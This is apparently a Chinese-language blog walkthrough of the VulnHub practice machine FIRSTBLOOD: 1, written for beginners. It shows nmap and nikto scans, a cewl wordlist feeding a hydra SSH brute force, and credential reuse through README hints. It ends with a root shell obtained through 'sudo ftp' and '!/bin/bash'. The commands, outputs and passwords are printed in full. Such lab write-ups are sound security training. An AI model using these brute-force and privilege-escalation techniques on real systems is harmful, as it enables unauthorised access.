vulnhub靶机-FIRSTBLOOD: 1

绪论：这个靶机比较简单，因为每一步都有提示，而且基本命令都给出来了

1、找到靶机ip：192.168.74.130

nmap -sn 192.168.74.0/24

2、扫描靶机端口，得到80端口和60022端口（ssh服务）

root@kali:~# nmap -A -p- 192.168.74.130
Starting Nmap 7.80 ( https://nmap.org )
Nmap scan report for 192.168.74.130
Host is up (0.00044s latency).
Not shown: 65533 closed ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    nginx 1.14.0 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_/johnnyrambo/
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Welcome to FirstBlood!
60022/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 46:01:d8:27:53:50:d9:e1:9a:cb:9d:1e:4c:b0:a5:ae (RSA)
|   256 4b:c8:77:49:db:5f:38:7f:36:e1:49:da:a4:a1:7c:5d (ECDSA)
|_  256 36:c8:65:e1:45:9a:9c:66:c9:c9:21:c4:5a:25:4d:76 (ED25519)
MAC Address: 00:0C:29:0E:84:DE (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=9/25%OT=80%CT=1%CU=39338%PV=Y%DS=1%DC=D%G=Y%M=000C29%T
OS:M=5F6D7C7E%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10C%TI=Z%CI=Z%II=I
OS:%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O
OS:5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6
OS:=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE
HOP RTT     ADDRESS
1   0.44 ms 192.168.74.130OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.80 seconds

3、先访问80端口，进来就是一大段的英文，关键点就是提示我们ctrl+U查看源码

就跟着做就行了，源码中发现一个rambo.html文件

访问得到又是一大段英文，提示我们使用nmap不加参数扫描的时候只能看到80端口开放，但是加上-p-就能看到另一个端口，这里其实我的习惯就是扫全端口，所以没啥用，还有就是使用nikto命令时会发现一个目录

下面是执行nikto命令的结果，得到了一个johnnyrambo目录，但是其实我们之前扫描的时候已经扫出来robots.txt文件了，所以这一步其实也可以不做

root@kali:~# nikto -h http://192.168.74.130
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.74.130
+ Target Hostname:    192.168.74.130
+ Target Port:        80
---------------------------------------------------------------------------
+ Server: nginx/1.14.0 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry ' /johnnyrambo/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ 7916 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time:           2020-09-25 15:39:22 (GMT8) (25 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:~#

访问这个目录果然还是一大波英文，关键的信息就是红色字体上面的，先使用cewl生成一个字典，然后就可以去爆破ssh密码了

3、使用命令生成字典，爆破之前我们还需要知道用户名，这里有一个讨巧的办法就是靶机开启之后在登陆界面是可以看到所有的登录用户的，根据前面的信息很容易猜到是johnny，还有端口也需要注意指定为之前扫到的60022，所以接下来就可以直接使用hydra进行爆破了，很快就找到了密码

root@kali:~# cewl -w words.txt -d 1 -m 5 http://192.168.74.130/johnnyrambo/
CeWL 5.4.8 (Inclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
root@kali:~# wc -l words.txt
137 words.txt
root@kali:~# hydra -l johnny -P words.txt -s 60022 ssh://192.168.74.130
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-25 15:47:21
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 137 login tries (l:1/p:137), ~9 tries per task
[DATA] attacking ssh://192.168.74.130:60022/
[60022][ssh] host: 192.168.74.130   login: johnny   password: Vietnam
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
[ERROR] 4 targets did not resolve or could not be connected
[ERROR] 0 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished
root@kali:~#

这里其实第2步也给了提示，就是访问ssh.html页面能够得到下一步提示和用户名

4、使用johnny/Vietnam用户名和密码ssh登录上去，查看家目录下的文件

root@kali:~# ssh 192.168.74.130 -p 60022
The authenticity of host '[192.168.74.130]:60022 ([192.168.74.130]:60022)' can't be established.
ECDSA key fingerprint is SHA256:9NWBNQ2bI/RnipoZ6hHKjL8BZq69S71dcT42eAnvjpg.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.74.130]:60022' (ECDSA) to the list of known hosts.
johnny@192.168.74.130's password: Vietnam（不可见）
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-88-generic x86_64)* Documentation:  https://help.ubuntu.com* Management:     https://landscape.canonical.com* Support:        https://ubuntu.com/advantage* Canonical Livepatch is available for installation.- Reduce system reboots and improve kernel security. Activate at:https://ubuntu.com/livepatch
Last login: Fri Sep 18 15:29:53 2020 from 192.168.86.109
johnny@firstblood:~$ ls
README.txt

发现一个README.txt文件，查看内容提示我们去查看一下配置文件得到网站的根目录

johnny@firstblood:~$ cat README.txt Nice job!  You're cruising along nicely!When we find ourselves on a web server, we want to check out the web directory.  In case you haven't figured it out, this server is running Nginx.  For this particular
setup, I've left things at the default.  If we look in the configuration file, we can
view the location of the web directory:cat /etc/nginx/sites-enabled/defaultThat's kind of noisy in the output.  We can clean it up with the following:cat /etc/nginx/sites-enabled/default | grep -v "#"-v is an invert match and will essentially remove all of the comment (#) lines.When we clean it up, the line starting with "root" points to the web directory.Move into the web directory and see if there are any files to read...

5、查看配置文件得到网站根目录（其实就是默认的），进入到那个目录下，又发现了一个README.txt

johnny@firstblood:~$ cat /etc/nginx/sites-enabled/default | grep -v "#"server {listen 80 default_server;listen [::]:80 default_server;root /var/www/html;index index.html index.htm index.nginx-debian.html;server_name _;location / {try_files $uri $uri/ =404;}}johnny@firstblood:~$ cd /var/www/html
johnny@firstblood:/var/www/html$ ls
index.nginx-debian.html  johnnyrambo  rambo.html  README.txt  robots.txt

查看内容提示我们找到另一个可读的README.txt

johnny@firstblood:/var/www/html$ cat README.txt
Hack the Planet!Nice work!I've hidden a file on this server which is readable by you.  Seems like a needle in the haystack, no?We can use the "find" command to find files.  If I wanted to find the /etc/passwd file:find /etc -name passwd -print^^ would generate some permission denied errors along with the correct response.We can redirect errors:find /etc -name passwd -print 2>/dev/nullThat last part:  2>/dev/null^^ will redirect errors to the same place where unicorn crap ends up.  It's magic.  Don't question me.If we run the following:find / -type f -readable 2>/dev/nullWe are going to get a LOT of noise.  However, if we fine tune this a bit:find / -type f -readable 2>/dev/null | grep README.txt-type f stands for type file
-readable stands for readable by this current user
| grep README.txt is a way to redirect the output to grep for a string match, the string being README.txtWe can narrow down the list.  Find the file, read the contents.

6、使用find命令查找到另一个README.txt文件

johnny@firstblood:/var/www/html$ find / -type f -readable 2>/dev/null | grep README.txt
/opt/README.txt
/var/www/html/README.txt
/home/johnny/README.txt

查看内容给了另一个用户名和账号

johnny@firstblood:/var/www/html$ cat /opt/README.txt There's another user on this server that might have greater privileges:username:  blood
password:  HackThePlanet2020!!You can either switch users or ssh as the new user.  If you know how to do both, pick one.
If you only know how to SSH, learn to switch users.

7、直接切换到blood用户，进入到它的家目录，也发现一个README.txt文件，提示在/home目录下还有一个用户，要我们尝试读取这个用户家目录下的文件

johnny@firstblood:/var/www/html$ su blood
Password: HackThePlanet2020!!（不可见）
blood@firstblood:/var/www/html$ cd ~
blood@firstblood:~$ ls
README.txt
blood@firstblood:~$ cat README.txt I didn't think you needed to be told about the README.txt file.I'm really stoked that you're cruising along.  Nice work!If you move into the /home directory, we can see the home directories for the other
users on this server.  There's a user directory with some text files.  Attempt to
read both files.

切换到/home目录下，发现sly目录是可读的，进入后发现两个文件，但是只有一个可读

blood@firstblood:~$ cd /home
blood@firstblood:/home$ ls -la
total 24
drwxr-xr-x  6 root       root       4096 Sep 18 14:24 .
drwxr-xr-x 23 root       root       4096 Sep 18 11:26 ..
drwxr-xr-x  4 blood      blood      4096 Sep 18 15:23 blood
drwx------ 17 firstblood firstblood 4096 Sep 18 11:45 firstblood
drwxr-xr-x  6 johnny     johnny     4096 Sep 18 15:24 johnny
drwxr-xr-x  4 sly        sly        4096 Sep 18 15:26 sly
blood@firstblood:/home/sly$ ls -l
total 8
-rw-rw-r-- 1 sly sly 583 Sep 18 15:26 README_FIRST.txt
-rw------- 1 sly sly 304 Sep 18 15:25 README.txt

查看README_FIRST.txt文件内容，提示使用sudo -l命令列举权限

blood@firstblood:/home/sly$ cat README_FIRST.txt Obviously, you're able to read this file but you're unable to read the other because
you don't have permissions.  If you perform an:  ls -alYou can see that only the user sly has permission to read README.txtHold that thought for a moment...In some instances we need to perform tasks as other users or even root sometimes.
We can see if we have those permissions by typing:sudo -l-l stands for list, as in -- list our permissions  We discover that we have the ability to run a command as sly that might help us.Figure out how to execute that command as the user sly.

8、使用sudo -l命令发现可以使用sly的身份查看上面的README.txt文件，在里面发现了sly的密码和一个网站说可能对提权到root有帮助，然后还是需要用到sudo命令

blood@firstblood:/home/sly$ sudo -l
Matching Defaults entries for blood on firstblood:env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser blood may run the following commands on firstblood:(sly) /bin/cat /home/sly/README.txt(root) NOPASSWD: /usr/bin/esudo-properties
blood@firstblood:/home/sly$ sudo -u sly /bin/cat /home/sly/README.txt
[sudo] password for blood: HackThePlanet2020!!（不可见）In case I forget, my password is:  SylvesterStalonePS -- I think root gave us sudo privileges.  I think this might be dangerous though
because I found a website:  https://gtfobins.github.io/It shows a possible privilege escalation for root.  I'm totally going to check out
root's files.  hint hint

9、切换到sly用户，使用sudo -l命令列举权限，发现有可以用任意登录用户身份执行的ftp命令

blood@firstblood:/home/sly$ su sly
Password: SylvesterStalone（不可见）
sly@firstblood:~$ sudo -l
Matching Defaults entries for sly on firstblood:env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser sly may run the following commands on firstblood:(ALL) /usr/bin/ftp(root) NOPASSWD: /usr/bin/esudo-properties
sly@firstblood:~$

那直接就可以使用ftp命令进行提取了，那个网站就是提供了很多命令提权的方式，提权到root之后进入到家目录读到最后的README.txt

sly@firstblood:~$ sudo ftp
[sudo] password for sly:SylvesterStalone（不可见）
ftp> !/bin/bash
root@firstblood:~# cd /root
root@firstblood:/root# ls
README.txt
root@firstblood:/root# cat README.txt
______ _          _  ______ _                 _
|  ___(_)        | | | ___ \ |               | |
| |_   _ _ __ ___| |_| |_/ / | ___   ___   __| |
|  _| | | '__/ __| __| ___ \ |/ _ \ / _ \ / _` |
| |   | | |  \__ \ |_| |_/ / | (_) | (_) | (_| |
\_|   |_|_|  |___/\__\____/|_|\___/ \___/ \__,_|____    ______            _           _     ____
\ \ \   | ___ \          | |         | |   / / /\ \ \  | |_/ /___   ___ | |_ ___  __| |  / / / > > > |    // _ \ / _ \| __/ _ \/ _` | < < <  / / /  | |\ \ (_) | (_) | ||  __/ (_| |  \ \ \
/_/_/   \_| \_\___/ \___/ \__\___|\__,_|   \_\_\I hope you enjoyed this box.  I wanted to create something
on the easier side because I know how frustrating and
rewarding the process can be.  If you liked this box
please reach out to me on Twitter and let me know:@iamv1nc3nt

10、总结

这个靶机的难度和指导性挺适合初学者和对这方面感兴趣却刚起步的玩一玩！

vulnhub靶机-FIRSTBLOOD: 1相关推荐

[网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例（一）
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...
Vulnhub靶机系列:SecTalks: BNE0x03 - Simple
这次的靶机是vulnhub靶机:SecTalks: BNE0x03 - Simple 文章目录靶机地址及相关描述靶机地址靶机描述 Simple CTF Location Hints 靶机设置利 ...
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(七)IMF【包含了sql注入,文件上传,gif图片木马制作,缓冲区溢出漏洞sploit等诸多知识点的靶机,超多干货】
靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机发布日期:2016年10月30日靶机描述:欢迎使用" IMF&qu ...
[网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell（三）
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步.前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施.这篇文章将讲 ...
Vulnhub靶机DC系列-DC-8
Vulnhub靶机DC系列-DC-8 靶场名称:DC-8 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ 下载地址: DC-8.zip (Size: 379 ...
Vulnhub靶机：EVILBOX_ ONE（很详细）
目录介绍信息收集主机发现主机信息探测网站探测目录扫描目录扫描字典爆破页面参数 Burpsuite爆破参数 ffuf 补充:区分文件包含与文件读取文件包含漏洞文件包含.任意文件读取的 ...
Vulnhub靶机渗透学习——DC-9
本文仅个人学习所做笔记,仅供参考,有不足之处请指出! vulnhub靶机 vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试.提权. ...
Vulnhub靶机Wakanda渗透测试攻略
前言 Wakanda是一个新的交易市场网站,很快会上线了.你的目标是通过黑客技术找到"振金"的确切位置. 页首配图本vulnhub靶机环境由xMagass开发,并托管于Vulnh ...
VMware检测不到vulnhub靶机IP地址解决办法
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 vulnhub靶机检测不到IP地址解决办法原因一:查看网络适配器是否为NAT模式原因二:虚拟网络编辑器配置出错原因三:靶机网卡配 ...

vulnhub靶机-FIRSTBLOOD: 1

vulnhub靶机-FIRSTBLOOD: 1相关推荐

最新文章

热门文章